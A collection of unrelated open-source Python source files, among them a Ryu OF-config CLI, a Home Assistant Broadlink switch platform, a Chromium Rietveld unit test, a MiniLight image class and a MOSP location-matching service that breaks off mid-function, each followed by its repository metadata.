print(p.resource_id + " " + p.name + " " + p.number)
self._request(line, f)
_port_settings = [
'admin-state',
'no-forward',
'no-packet-in',
'no-receive',
]
def do_get_port_config(self, line):
"""get_config_port <peer> <source> <port>
eg. get_port_config sw1 running LogicalSwitch7-Port2
"""
def f(p, args):
try:
source, port = args
except:
print("argument error")
return
o = p.get_config(source)
for p in o.resources.port:
if p.resource_id != port:
continue
print(p.resource_id)
conf = p.configuration
for k in self._port_settings:
try:
v = getattr(conf, k)
except AttributeError:
continue
print(k + " " + v)
self._request(line, f)
def do_set_port_config(self, line):
"""set_port_config <peer> <target> <port> <key> <value>
eg. set_port_config sw1 running LogicalSwitch7-Port2 admin-state down
eg. set_port_config sw1 running LogicalSwitch7-Port2 no-forward false
"""
def f(p, args):
try:
target, port, key, value = args
except:
print("argument error")
print(args)
return
# get switch id
o = p.get()
capable_switch_id = o.id
try:
capable_switch = ofc.OFCapableSwitchType(
id=capable_switch_id,
resources=ofc.OFCapableSwitchResourcesType(
port=[
ofc.OFPortType(
resource_id=port,
configuration=ofc.OFPortConfigurationType(
**{key: value}))
]
)
)
except TypeError:
print("argument error")
return
try:
p.edit_config(target, capable_switch)
except Exception as e:
print(e)
self._request(line, f)
def do_list_queue(self, line):
"""list_queue <peer>
"""
def f(p, args):
o = p.get()
if o.resources.queue:
for q in o.resources.queue:
print(q.resource_id + " " + q.port)
self._request(line, f)
_queue_settings = [
'max-rate',
'min-rate',
'experimenter',
]
def do_get_queue_config(self, line):
"""get_queue_port <peer> <source> <queue>
eg. get_queue_config sw1 running LogicalSwitch7-Port1-Queue922
"""
def f(p, args):
try:
source, queue = args
except:
print("argument error")
return
o = p.get_config(source)
for q in o.resources.queue:
if q.resource_id != queue:
continue
print(q.resource_id)
conf = q.properties
for k in self._queue_settings:
try:
v = getattr(conf, k)
except AttributeError:
continue
print(k + " " + v)
self._request(line, f)
def do_set_queue_config(self, line):
"""set_queue_config <peer> <target> <queue> <key> <value>
eg. set_queue_config sw1 running LogicalSwitch7-Port1-Queue922 \
max-rate 100
"""
def f(p, args):
try:
target, queue, key, value = args
except:
print("argument error")
print(args)
return
# get switch id
o = p.get()
capable_switch_id = o.id
try:
capable_switch = ofc.OFCapableSwitchType(
id=capable_switch_id,
resources=ofc.OFCapableSwitchResourcesType(
queue=[
ofc.OFQueueType(
resource_id=queue,
properties=ofc.OFQueuePropertiesType(
**{key: value})),
]
)
)
except TypeError:
print("argument error")
return
try:
p.edit_config(target, capable_switch)
except Exception as e:
print(e)
self._request(line, f)
def do_add_queue(self, line):
"""add_queue <peer> <target> <logical-switch> <queue>
eg. add_queue sw1 running LogicalSwitch7 NameOfNewQueue
"""
def f(p, args):
try:
target, lsw, queue = args
except:
print("argument error")
print(args)
return
# get switch id
o = p.get()
capable_switch_id = o.id
try:
capable_switch = ofc.OFCapableSwitchType(
id=capable_switch_id,
resources=ofc.OFCapableSwitchResourcesType(
queue=[
ofc.OFQueueType(resource_id=queue)
]
),
logical_switches=ofc.OFCapableSwitchLogicalSwitchesType(
switch=[ofc.OFLogicalSwitchType(
id=lsw,
resources=ofc.OFLogicalSwitchResourcesType(
queue=[queue])
)]
)
)
except TypeError:
print("argument error")
return
try:
p.edit_config(target, capable_switch)
except Exception as e:
print(e)
self._request(line, f)
def do_list_logical_switch(self, line):
"""list_logical_switch <peer>
"""
def f(p, args):
o = p.get()
for s in o.logical_switches.switch:
print(s.id + " " + s.datapath_id)
self._request(line, f)
def do_show_logical_switch(self, line):
"""show_logical_switch <peer> <logical switch>
"""
def f(p, args):
try:
(lsw,) = args
except:
print("argument error")
return
o = p.get()
for s in o.logical_switches.switch:
if s.id != lsw:
continue
print(s.id)
print('datapath-id ' + s.datapath_id)
if s.resources.queue:
print('queues:')
for q in s.resources.queue:
print('\t ' + q)
if s.resources.port:
print('ports:')
for p in s.resources.port:
print('\t ' + p)
self._request(line, f)
_lsw_settings = [
'lost-connection-behavior',
]
def do_get_logical_switch_config(self, line):
"""get_logical_switch_config <peer> <source> <logical switch>
"""
def f(p, args):
try:
source, lsw = args
except:
print("argument error")
return
o = p.get_config(source)
for l in o.logical_switches.switch:
if l.id != lsw:
continue
print(l.id)
for k in self._lsw_settings:
try:
v = getattr(l, k)
except AttributeError:
continue
print(k + " " + v)
self._request(line, f)
def do_set_logical_switch_config(self, line):
"""set_logical_switch_config <peer> <logical switch> <key> <value>
eg. set_logical_switch_config sw1 running LogicalSwitch7 \
lost-connection-behavior failStandaloneMode
"""
def f(p, args):
try:
target, lsw, key, value = args
except:
print("argument error")
return
# get switch id
o = p.get_config(target)
capable_switch_id = o.id
try:
capable_switch = ofc.OFCapableSwitchType(
id=capable_switch_id,
logical_switches=ofc.OFCapableSwitchLogicalSwitchesType(
switch=[ofc.OFLogicalSwitchType(
id=lsw,
**{key: value}
)]
)
)
except TypeError:
print("argument error")
return
try:
p.edit_config(target, capable_switch)
except Exception as e:
print(e)
self._request(line, f)
completedefault = _complete_peer
def complete_EOF(self, _text, _line, _begidx, _endidx):
return []
def do_EOF(self, _line):
sys.exit(0)
def onecmd(self, string):
self._in_onecmd = True
try:
return cmd.Cmd.onecmd(self, string)
finally:
self._in_onecmd = False
def main(args=None, prog=None):
CONF(args=args, prog=prog,
project='of-config-cli', version='of-config-cli')
for p_str in CONF.peers:
name, addr = p_str.split('=')
host, port, username, password = addr.rsplit(':', 3)
add_peer(name, host, port, username, password)
Cmd().cmdloop()
if __name__ == "__main__":
main()
| StephenKing/summerschool-2015-ryu | ryu/cmd/of_config_cli.py | Python | apache-2.0 | 15,540 |
# -*- coding: UTF-8 -*-
import numpy as np
import pandas as pd
import os
from dateutil.parser import parse
def _macd(closes):
ema12 = _ema(closes, 12)
ema26 = _ema(closes, 26)
diff = ema12 - ema26
dea = _ema(diff, 9)
osc = diff - dea
return (osc * 2, diff, dea)
def _ma(closes, cycle=5):
result = np.zeros(cycle)
for i in np.arange(cycle, closes.size):
result = np.append(result, [np.mean(closes[i - cycle:i])])
return result
def _ema(closes, cycle=12):
if closes.size <= 0:
return np.array([])
a = 2 / np.float64((cycle + 1))
ema0 = closes[0]
result = np.array([ema0])
def curema(index, value):
return result[index - 1] + a * (value - result[index - 1])
for i in np.arange(1, closes.size):
result = np.append(result, [curema(i, closes[i])])
return result
def splicsvpath(csvpath):
bn = os.path.basename(csvpath)
filename, ext = os.path.splitext(bn)
return (filename[2:], filename[:2])
class Stock:
def __init__(self, csvpath, cal=True):
self.symbol, self.code = splicsvpath(csvpath)
self.datas = [{
'date': parse(d[1]).date(),
'open': np.float64(d[2]),
'high': np.float64(d[3]),
'low': np.float64(d[4]),
'close': np.float64(d[5]),
'volume': np.float64(d[6])
} for d in pd.read_csv(csvpath).as_matrix()]
if cal:
closes = np.array([d['close'] for d in self.datas])
self.macd, self.div, self.dea = _macd(closes)
self.em5 = _ma(closes, 5)
self.em10 = _ma(closes, 10)
self.em20 = _ma(closes, 20)
self.em30 = _ma(closes, 30)
self.em60 = _ma(closes, 60)
self.ema5 = _ema(closes, 5)
self.ema10 = _ema(closes, 10)
self.ema20 = _ema(closes, 20)
self.ema60 = _ema(closes, 60)
def length(self):
return len(self.datas)
| m860/data-analysis-with-python | filter/Stock.py | Python | mit | 2,079 |
"""
Support for Broadlink RM devices.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/switch.broadlink/
"""
from datetime import timedelta
from base64 import b64encode, b64decode
import asyncio
import binascii
import logging
import socket
import voluptuous as vol
from homeassistant.util.dt import utcnow
from homeassistant.util import Throttle
from homeassistant.components.switch import (SwitchDevice, PLATFORM_SCHEMA)
from homeassistant.const import (
CONF_FRIENDLY_NAME, CONF_SWITCHES,
CONF_COMMAND_OFF, CONF_COMMAND_ON,
CONF_TIMEOUT, CONF_HOST, CONF_MAC, CONF_TYPE)
import homeassistant.helpers.config_validation as cv
REQUIREMENTS = ['broadlink==0.5']
_LOGGER = logging.getLogger(__name__)
TIME_BETWEEN_UPDATES = timedelta(seconds=5)
DOMAIN = 'broadlink'
DEFAULT_NAME = 'Broadlink switch'
DEFAULT_TIMEOUT = 10
DEFAULT_RETRY = 3
SERVICE_LEARN = 'learn_command'
SERVICE_SEND = 'send_packet'
CONF_SLOTS = 'slots'
RM_TYPES = ['rm', 'rm2', 'rm_mini', 'rm_pro_phicomm', 'rm2_home_plus',
'rm2_home_plus_gdt', 'rm2_pro_plus', 'rm2_pro_plus2',
'rm2_pro_plus_bl', 'rm_mini_shate']
SP1_TYPES = ['sp1']
SP2_TYPES = ['sp2', 'honeywell_sp2', 'sp3', 'spmini2', 'spminiplus']
MP1_TYPES = ["mp1"]
SWITCH_TYPES = RM_TYPES + SP1_TYPES + SP2_TYPES + MP1_TYPES
SWITCH_SCHEMA = vol.Schema({
vol.Optional(CONF_COMMAND_OFF, default=None): cv.string,
vol.Optional(CONF_COMMAND_ON, default=None): cv.string,
vol.Optional(CONF_FRIENDLY_NAME): cv.string,
})
MP1_SWITCH_SLOT_SCHEMA = vol.Schema({
vol.Optional('slot_1'): cv.string,
vol.Optional('slot_2'): cv.string,
vol.Optional('slot_3'): cv.string,
vol.Optional('slot_4'): cv.string
})
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_SWITCHES, default={}):
vol.Schema({cv.slug: SWITCH_SCHEMA}),
vol.Optional(CONF_SLOTS, default={}): MP1_SWITCH_SLOT_SCHEMA,
vol.Required(CONF_HOST): cv.string,
vol.Required(CONF_MAC): cv.string,
vol.Optional(CONF_FRIENDLY_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_TYPE, default=SWITCH_TYPES[0]): vol.In(SWITCH_TYPES),
vol.Optional(CONF_TIMEOUT, default=DEFAULT_TIMEOUT): cv.positive_int
})
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Set up Broadlink switches."""
import broadlink
devices = config.get(CONF_SWITCHES)
slots = config.get('slots', {})
ip_addr = config.get(CONF_HOST)
friendly_name = config.get(CONF_FRIENDLY_NAME)
mac_addr = binascii.unhexlify(
config.get(CONF_MAC).encode().replace(b':', b''))
switch_type = config.get(CONF_TYPE)
@asyncio.coroutine
def _learn_command(call):
try:
auth = yield from hass.async_add_job(broadlink_device.auth)
except socket.timeout:
_LOGGER.error("Failed to connect to device, timeout")
return
if not auth:
_LOGGER.error("Failed to connect to device")
return
yield from hass.async_add_job(broadlink_device.enter_learning)
_LOGGER.info("Press the key you want HASS to learn")
start_time = utcnow()
while (utcnow() - start_time) < timedelta(seconds=20):
packet = yield from hass.async_add_job(
broadlink_device.check_data)
if packet:
log_msg = "Recieved packet is: {}".\
format(b64encode(packet).decode('utf8'))
_LOGGER.info(log_msg)
hass.components.persistent_notification.async_create(
log_msg, title='Broadlink switch')
return
yield from asyncio.sleep(1, loop=hass.loop)
_LOGGER.error("Did not received any signal")
hass.components.persistent_notification.async_create(
"Did not received any signal", title='Broadlink switch')
@asyncio.coroutine
def _send_packet(call):
packets = call.data.get('packet', [])
for packet in packets:
for retry in range(DEFAULT_RETRY):
try:
extra = len(packet) % 4
if extra > 0:
packet = packet + ('=' * (4 - extra))
payload = b64decode(packet)
yield from hass.async_add_job(
broadlink_device.send_data, payload)
break
except (socket.timeout, ValueError):
try:
yield from hass.async_add_job(
broadlink_device.auth)
except socket.timeout:
if retry == DEFAULT_RETRY-1:
_LOGGER.error("Failed to send packet to device")
def _get_mp1_slot_name(switch_friendly_name, slot):
if not slots['slot_{}'.format(slot)]:
return '{} slot {}'.format(switch_friendly_name, slot)
return slots['slot_{}'.format(slot)]
if switch_type in RM_TYPES:
broadlink_device = broadlink.rm((ip_addr, 80), mac_addr)
hass.services.register(DOMAIN, SERVICE_LEARN + '_' +
ip_addr.replace('.', '_'), _learn_command)
hass.services.register(DOMAIN, SERVICE_SEND + '_' +
ip_addr.replace('.', '_'), _send_packet)
switches = []
for object_id, device_config in devices.items():
switches.append(
BroadlinkRMSwitch(
device_config.get(CONF_FRIENDLY_NAME, object_id),
broadlink_device,
device_config.get(CONF_COMMAND_ON),
device_config.get(CONF_COMMAND_OFF)
)
)
elif switch_type in SP1_TYPES:
broadlink_device = broadlink.sp1((ip_addr, 80), mac_addr)
switches = [BroadlinkSP1Switch(friendly_name, broadlink_device)]
elif switch_type in SP2_TYPES:
broadlink_device = broadlink.sp2((ip_addr, 80), mac_addr)
switches = [BroadlinkSP2Switch(friendly_name, broadlink_device)]
elif switch_type in MP1_TYPES:
switches = []
broadlink_device = broadlink.mp1((ip_addr, 80), mac_addr)
parent_device = BroadlinkMP1Switch(broadlink_device)
for i in range(1, 5):
slot = BroadlinkMP1Slot(
_get_mp1_slot_name(friendly_name, i),
broadlink_device, i, parent_device)
switches.append(slot)
broadlink_device.timeout = config.get(CONF_TIMEOUT)
try:
broadlink_device.auth()
except socket.timeout:
_LOGGER.error("Failed to connect to device")
add_devices(switches)
class BroadlinkRMSwitch(SwitchDevice):
"""Representation of an Broadlink switch."""
def __init__(self, friendly_name, device, command_on, command_off):
"""Initialize the switch."""
self._name = friendly_name
self._state = False
self._command_on = b64decode(command_on) if command_on else None
self._command_off = b64decode(command_off) if command_off else None
self._device = device
@property
def name(self):
"""Return the name of the switch."""
return self._name
@property
def assumed_state(self):
"""Return true if unable to access real state of entity."""
return True
@property
def should_poll(self):
"""Return the polling state."""
return False
@property
def is_on(self):
"""Return true if device is on."""
return self._state
def turn_on(self, **kwargs):
"""Turn the device on."""
if self._sendpacket(self._command_on):
self._state = True
self.schedule_update_ha_state()
def turn_off(self, **kwargs):
"""Turn the device off."""
if self._sendpacket(self._command_off):
self._state = False
self.schedule_update_ha_state()
def _sendpacket(self, packet, retry=2):
"""Send packet to device."""
if packet is None:
_LOGGER.debug("Empty packet")
return True
try:
self._device.send_data(packet)
except (socket.timeout, ValueError) as error:
if retry < 1:
_LOGGER.error(error)
return False
if not self._auth():
return False
return self._sendpacket(packet, retry-1)
return True
def _auth(self, retry=2):
try:
auth = self._device.auth()
except socket.timeout:
auth = False
if not auth and retry > 0:
return self._auth(retry-1)
return auth
class BroadlinkSP1Switch(BroadlinkRMSwitch):
"""Representation of an Broadlink switch."""
def __init__(self, friendly_name, device):
"""Initialize the switch."""
super().__init__(friendly_name, device, None, None)
self._command_on = 1
self._command_off = 0
def _sendpacket(self, packet, retry=2):
"""Send packet to device."""
try:
self._device.set_power(packet)
except (socket.timeout, ValueError) as error:
if retry < 1:
_LOGGER.error(error)
return False
if not self._auth():
return False
return self._sendpacket(packet, retry-1)
return True
class BroadlinkSP2Switch(BroadlinkSP1Switch):
"""Representation of an Broadlink switch."""
@property
def assumed_state(self):
"""Return true if unable to access real state of entity."""
return False
@property
def should_poll(self):
"""Return the polling state."""
return True
def update(self):
"""Synchronize state with switch."""
self._update()
def _update(self, retry=2):
try:
state = self._device.check_power()
except (socket.timeout, ValueError) as error:
if retry < 1:
_LOGGER.error(error)
return
if not self._auth():
return
return self._update(retry-1)
if state is None and retry > 0:
return self._update(retry-1)
self._state = state
class BroadlinkMP1Slot(BroadlinkRMSwitch):
"""Representation of a slot of Broadlink switch."""
def __init__(self, friendly_name, device, slot, parent_device):
"""Initialize the slot of switch."""
super().__init__(friendly_name, device, None, None)
self._command_on = 1
self._command_off = 0
self._slot = slot
self._parent_device = parent_device
@property
def assumed_state(self):
"""Return true if unable to access real state of entity."""
return False
def _sendpacket(self, packet, retry=2):
"""Send packet to device."""
try:
self._device.set_power(self._slot, packet)
except (socket.timeout, ValueError) as error:
if retry < 1:
_LOGGER.error(error)
return False
if not self._auth():
return False
return self._sendpacket(packet, max(0, retry-1))
return True
@property
def should_poll(self):
"""Polling needed."""
return True
def update(self):
"""Trigger update for all switches on the parent device."""
self._parent_device.update()
self._state = self._parent_device.get_outlet_status(self._slot)
class BroadlinkMP1Switch(object):
"""Representation of a Broadlink switch - To fetch states of all slots."""
def __init__(self, device):
"""Initialize the switch."""
self._device = device
self._states = None
def get_outlet_status(self, slot):
"""Get status of outlet from cached status list."""
return self._states['s{}'.format(slot)]
@Throttle(TIME_BETWEEN_UPDATES)
def update(self):
"""Fetch new state data for this device."""
self._update()
def _update(self, retry=2):
try:
states = self._device.check_power()
except (socket.timeout, ValueError) as error:
if retry < 1:
_LOGGER.error(error)
return
if not self._auth():
return
return self._update(max(0, retry-1))
if states is None and retry > 0:
return self._update(max(0, retry-1))
self._states = states
def _auth(self, retry=2):
try:
auth = self._device.auth()
except socket.timeout:
auth = False
if not auth and retry > 0:
return self._auth(retry-1)
return auth
| ewandor/home-assistant | homeassistant/components/switch/broadlink.py | Python | apache-2.0 | 12,810 |
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import json
import logging
import unittest
import urllib2
from webkitpy.common.net.rietveld import filter_latest_jobs
from webkitpy.common.net.rietveld import get_latest_try_job_results
from webkitpy.common.net.rietveld import latest_try_jobs
from webkitpy.common.net.buildbot import Build
from webkitpy.common.net.web_mock import MockWeb
from webkitpy.common.system.outputcapture import OutputCapture
_log = logging.getLogger(__name__)
class RietveldTest(unittest.TestCase):
def setUp(self):
self.web = MockWeb(urls={
'https://codereview.chromium.org/api/11112222': json.dumps({
'patchsets': [1, 2, 3],
}),
'https://codereview.chromium.org/api/11112222/2': json.dumps({
'try_job_results': [
{
'builder': 'foo-builder',
'buildnumber': 10,
'result': -1
},
{
'builder': 'bar-builder',
'buildnumber': 50,
'results': 0
},
],
}),
'https://codereview.chromium.org/api/11112222/3': json.dumps({
'try_job_results': [
{
'builder': 'foo-builder',
'buildnumber': 20,
'result': 1
},
{
'builder': 'bar-builder',
'buildnumber': 60,
'result': 0
},
],
}),
'https://codereview.chromium.org/api/11113333': 'my non-JSON contents',
})
def test_latest_try_jobs(self):
self.assertEqual(
latest_try_jobs(11112222, ('bar-builder', 'other-builder'), self.web),
[Build('bar-builder', 60)])
def test_latest_try_jobs_http_error(self):
def raise_error(_):
raise urllib2.URLError('Some request error message')
self.web.get_binary = raise_error
oc = OutputCapture()
try:
oc.capture_output()
self.assertEqual(latest_try_jobs(11112222, ('bar-builder',), self.web), [])
finally:
_, _, logs = oc.restore_output()
self.assertEqual(logs, 'Request failed to URL: https://codereview.chromium.org/api/11112222\n')
def test_latest_try_jobs_non_json_response(self):
oc = OutputCapture()
try:
oc.capture_output()
self.assertEqual(latest_try_jobs(11113333, ('bar-builder',), self.web), [])
finally:
_, _, logs = oc.restore_output()
self.assertEqual(logs, 'Invalid JSON: my non-JSON contents\n')
def test_latest_try_jobs_with_patchset(self):
self.assertEqual(
latest_try_jobs(11112222, ('bar-builder', 'other-builder'), self.web, patchset_number=2),
[Build('bar-builder', 50)])
def test_latest_try_jobs_no_relevant_builders(self):
self.assertEqual(latest_try_jobs(11112222, ('foo', 'bar'), self.web), [])
def test_get_latest_try_job_results(self):
self.assertEqual(get_latest_try_job_results(11112222, self.web), {'foo-builder': 1, 'bar-builder': 0})
def test_filter_latest_jobs_empty(self):
self.assertEqual(filter_latest_jobs([]), [])
def test_filter_latest_jobs_higher_build_first(self):
self.assertEqual(
filter_latest_jobs([Build('foo', 5), Build('foo', 3), Build('bar', 5)]),
[Build('foo', 5), Build('bar', 5)])
def test_filter_latest_jobs_higher_build_last(self):
self.assertEqual(
filter_latest_jobs([Build('foo', 3), Build('bar', 5), Build('foo', 5)]),
[Build('bar', 5), Build('foo', 5)])
def test_filter_latest_jobs_no_build_number(self):
self.assertEqual(
filter_latest_jobs([Build('foo', 3), Build('bar')]),
[Build('foo', 3)])
| danakj/chromium | third_party/WebKit/Tools/Scripts/webkitpy/common/net/rietveld_unittest.py | Python | bsd-3-clause | 4,193 |
# MiniLight Python : minimal global illumination renderer
#
# Harrison Ainsworth / HXA7241 and Juraj Sukop : 2007-2008, 2013.
# http://www.hxa.name/minilight
from math import log10
from vector3f import Vector3f
IMAGE_DIM_MAX = 4000
PPM_ID = 'P6'
MINILIGHT_URI = 'http://www.hxa.name/minilight'
DISPLAY_LUMINANCE_MAX = 200.0
RGB_LUMINANCE = Vector3f(0.2126, 0.7152, 0.0722)
GAMMA_ENCODE = 0.45
class Img(object):
def __init__(self, w, h):
self.width = w
self.height = h
self.pixels = [0.0] * self.width * self.height * 3
def copyPixels(self, data):
assert len(data) == len(self.pixels)
i = 0
for y in range(self.height):
offset = 3 *(self.width * (self.height - 1 - y))
for x in range(3 * self.width):
self.pixels[ offset + x ] = data[ i ]
i += 1
def add_to_pixel(self, x, y, radiance):
if x >= 0 and x < self.width and y >= 0 and y < self.height:
index = (x + ((self.height - 1 - y) * self.width)) * 3
for a in radiance:
self.pixels[index] += a
index += 1
def get_formatted(self, out, iteration):
divider = 1.0 / (iteration if iteration >= 1 else 1)
tonemap_scaling = self.calculate_tone_mapping(self.pixels, divider)
out.write('%s\n# %s\n\n%u %u\n255\n' % (PPM_ID, MINILIGHT_URI,
self.width, self.height))
for channel in self.pixels:
mapped = channel * divider * tonemap_scaling
gammaed = (mapped if mapped > 0.0 else 0.0) ** GAMMA_ENCODE
out.write(chr(min(int((gammaed * 255.0) + 0.5), 255)))
def calculate_tone_mapping(self, pixels, divider):
sum_of_logs = 0.0
for i in range(len(pixels) / 3):
y = Vector3f(pixels[i * 3: i * 3 + 3]).dot(RGB_LUMINANCE) * divider
sum_of_logs += log10(y if y > 1e-4 else 1e-4)
adapt_luminance = 10.0 ** (sum_of_logs / (len(pixels) / 3))
a = 1.219 + (DISPLAY_LUMINANCE_MAX * 0.25) ** 0.4
b = 1.219 + adapt_luminance ** 0.4
return ((a / b) ** 2.5) / DISPLAY_LUMINANCE_MAX
| imapp-pl/golem | gnr/benchmarks/minilight/src/img.py | Python | gpl-3.0 | 2,157 |
# coding: utf-8
# Ref: http://learn101.org/xhosa_plural.php
from sua import *
data = {
'order': bantu['order'],
'order_triple': bantu['order_triple'],
'plural': {
'prefix': {'in': 'izin', 'um':'aba'},
},
'conjugate': {
'prefix': {
'default': {
'inf': 'uku',
'now_tdy': {JE:'nda', TU:'u', ELLE:'uh', IL:'uh', IT:'uh', NOUS:'siya', VOUS:'wa', ELLES:'ba', ILS:'ba'},
'tdy': {JE:'ndi', TU:'u', ELLE:'u', IL:'u', IT:'u', NOUS:'si', VOUS:'we', ELLES:'be', ILS:'be'},
'tmw': {JE:'ndizo', TU:'uzo', ELLE:'uzo', IL:'uzo', IT:'uzo', NOUS:'sizo', VOUS:'wazo', ELLES:'bazo', ILS:'bazo'},
'ydy': {JE:'nda', TU:'u', ELLE:'uh', IL:'uh', IT:'uh', NOUS:'siya', VOUS:'wa', ELLES:'ba', ILS:'ba'},
},
},
'suffix': {
'default': {
'inf': 'a',
'tdy': 'a',
'tmw': 'a',
'ydy': 'a',
'now_tdy': 'ile',
},
},
},
'stem': {'prefix': 'uku', 'suffix': 'a'},
'subs': [
('[a]', ''),
('[the]', ''),
]
}
| kasahorow/kwl | data/sua_xhosa.py | Python | bsd-2-clause | 1,021 |
#!/bin/env python
"""Service to collect and maintain data from external devices."""
import os
import sys
sys.path.append("../..")
import time
import math
from math import sqrt, acos, degrees
from collections import namedtuple
from multiprocessing import Pipe
from multiprocessing import Process as MultiProcess
import hmac
import hashlib
from SimPy.SimulationRT import hold, passivate, Process
import cherrypy
from cherrypy import expose
from peach import fuzzy
from numpy import linspace
from mosp.geo import osm, utm
from external_person import ExternalPerson
#XXX DEBUG, remove this
from mosp.monitors import SocketPlayerMonitor
__author__ = "P. Tute, B. Henne"
__maintainer__ = "B. Henne"
__contact__ = "[email protected]"
__copyright__ = "(c) 2012, DCSec, Leibniz Universitaet Hannover, Germany"
__license__ = "GPLv3"
HMAC_KEY_DEFAULT = 'omfgakeywtfdoidonow?'
MIN_ACCURACY = 100 # meter
LOCATION_CACHE_SIZE = 2 # should be 2 at last!
class ConnectionService(object):
def __init__(self, address, port, conn, map_path, free_move_only, hmac_key):
self.sign = hmac.HMAC(hmac_key, digestmod=hashlib.sha256)
self.conn = conn
cherrypy.config.update({'server.socket_host': address,
'server.socket_port': port,
'tools.staticdir.on': True,
'tools.staticdir.dir': os.path.join(os.path.dirname(os.path.abspath(__file__)), '../../mosp_tools/external_device_slippy_map_client/'),
#'log.screen': False,
})
self.MatchingData = namedtuple('MatchingData', 'matched_way x y acc')
self.Point = namedtuple('Point', 'x y time')
self.last_match = {} # {id: MatchingData}
self.received_points = {} # {id: [Point, ...]}
self.matches = {} # {id: {time: MatchingData}}
self.need_init = []
self.known_times = {} # {id: {time: [lat, lon, acc]}}
self.free_move_only = free_move_only
self.geo = osm.OSMModel(map_path)
self.geo.initialize(sim=None, enable_routing=False)
self.min_x = self.geo.bounds['min_x']
self.max_x = self.geo.bounds['max_x']
self.min_y = self.geo.bounds['min_y']
self.max_y = self.geo.bounds['max_y']
# init for fuzzy logic
# XXX value taken from paper, might need improvement
self.curve_center = 7
self.short_distance = fuzzy.DecreasingSigmoid(self.curve_center, 1)
self.long_distance = fuzzy.IncreasingSigmoid(self.curve_center, 1)
self.small_angle = fuzzy.DecreasingRamp(25, 65)
self.large_angle = fuzzy.IncreasingRamp(25, 65)
self.output_low = fuzzy.DecreasingRamp(3, 5)
self.output_avg = fuzzy.Triangle(3, 5, 7)
self.output_high = fuzzy.IncreasingRamp(5, 7)
self.c = fuzzy.Controller(linspace(0.0, 10.0, 100))
# rule 1: IF distance IS short AND angle IS small THEN propability IS high
self.c.add_rule(((self.short_distance, self.small_angle), self.output_high))
# rule 2: IF distance IS long AND angle IS large THEN propability IS low
self.c.add_rule(((self.long_distance, self.large_angle), self.output_low))
# rule 3: IF distance IS short AND angle IS large THEN propability IS average
self.c.add_rule(((self.short_distance, self.large_angle), self.output_avg))
# rule 4: IF distance IS long AND angle IS small THEN propability IS average
self.c.add_rule(((self.long_distance, self.small_angle), self.output_avg))
@expose
def dummylocation(self, id='', lat='', lon='', acc='', speed='', bearing=''):
msg_sign = self.sign.copy()
msg_sign.update(id + lat + lon)
msg_hash = msg_sign.hexdigest()
self.location(id=id, lat=lat, lon=lon, acc=acc, hmac=msg_hash)
@expose
def location(self, id='', lat='', lon='', acc='', hmac=''):
"""Handle incoming location from $HOSTNAME:$PORT/location?$PARAMS."""
time_received = time.time()
msg_sign = self.sign.copy()
msg_sign.update(id + lat + lon)
msg_hash = msg_sign.hexdigest()
# check HMAC
if msg_hash != hmac:
print 'HMAC hashes do not match!'
print 'hash of message', msg_hash
print 'hash received: ', hmac
return '<h1>Error!</h1>'
try:
# extract values from received strings
id_value = int(id)
lat_value = float(lat)
lon_value = float(lon)
x, y = utm.latlong_to_utm(lon_value, lat_value)
acc_value = float(acc)
if acc_value > MIN_ACCURACY:
print 'Received data with insufficient accuracy of {:f}. Minimal accuracy is {:d}'.format(acc_value, MIN_ACCURACY)
return '<h1>Not accurate enough!</h1>'
if (x - acc_value < self.min_x or
x + acc_value > self.max_x or
y - acc_value < self.min_y or
y + acc_value > self.max_y):
print 'Received data with out of bounds coordinates!'
print id + ' ' +lat + ' ' +lon + ' ' + acc
self.conn.send([id_value, None, None, x, y, time_received])
#self.conn.send([id_value, None, None, x, y, time_received, lat_value, lon_value])
return '<h1>Out of bounds!</h1>'
except ValueError:
# some value was not well formatted...ignore message
print 'Received invalid data!'
return '<h1>Values not well formatted!</h1>'
# send data to simulation
if self.free_move_only:
self.conn.send([id_value, None, None, x, y, time_received])
else:
match = self.fuzzy_map_match(id_value, x, y, acc_value, time_received)
if match is not None:
self.conn.send(match)
else:
self.conn.send([id_value, None, None, x, y, time_received])
#self.conn.send([id_value, None, None, x, y, time_received, lat_value, lon_value])
# save received coordinates
if id not in self.received_points:
self.received_points[id_value] = [self.Point(x, y, time_received)]
else:
self.received_points[id_value].append(self.Point(x, y, time_received))
while len(self.received_points[id_value]) > LOCATION_CACHE_SIZE:
del sorted(self.received_points[id_value], key=lambda p: p.time_received)[0]
print 'Received valid data: ID ' + id + ', lat ' +lat + ', lon ' +lon + ', acc ' + acc + ', at ' + str(time_received)
return '<h1>Correct!</h1>'
def add_match(self, time, id, x, y, acc, way_segment):
"""Add a new set of values to the known locations and remove an old one if necessary.
@param time: Timestamp of receive-time
@param id: id of the person
@param x: x coordinate of received location
@param y: y coordinate of received location
@param acc: accuracy of received location
@param way_segment: the current way segment the person was matched to
"""
values = self.MatchingData(way_segment, x, y, acc)
if id not in self.matches:
self.matches[id] = {}
self.matches[id][time] = values
self.last_match[id] = values
if len(self.matches[id]) > LOCATION_CACHE_SIZE:
del self.matches[id][sorted(self.matches[id].keys())[0]]
def fuzzy_map_match(self, id, x, y, acc, time):
"""Match the received coordinates to the OSM-map using fuzzy logic.
Algorithm is based on http://d-scholarship.pitt.edu/11787/4/Ren,_Ming_Dissertation.pdf (Chapter 4.3)
@param id: id of the person
@param x: x coordinate of received location
@param y: y coordinate of received location
@param acc: accuracy of received location
@param time: timestamp of receival
@return: a list with format [person_id, node_id_start, node_id_end, matched_x, matched_y, time_received] or None if no match was found
"""
if not id in self.matches or id in self.need_init:
print '\tinitial map',
if id in self.need_init:
print 'because of renewal',
self.need_init.remove(id)
print
if id not in self.received_points:
# at least two points are needed (current one and previous one) to be able to match
print 'not enough points yet'
return None
last_fix = sorted(self.received_points[id], key=lambda p: p.time, reverse=True)[0]
segment, matched_x, matched_y = self.initial_fuzzy_match(x, y, last_fix.x, last_fix.y, acc)
else:
print '\tsubsequent match'
match = self.subsequent_fuzzy_match(x, y, acc, self.last_match[id].matched_way, id)
if match is not None:
segment, matched_x, matched_y = match
else:
print 'Persons left matched segment, redo initial match.'
segment, matched_x, matched_y = self.initial_fuzzy_match(x, y, last_fix.x, last_fix.y, acc)
if segment is None:
print '\tno result segment'
# No segment found
return None
print '\tresult ', segment, matched_x, matched_y
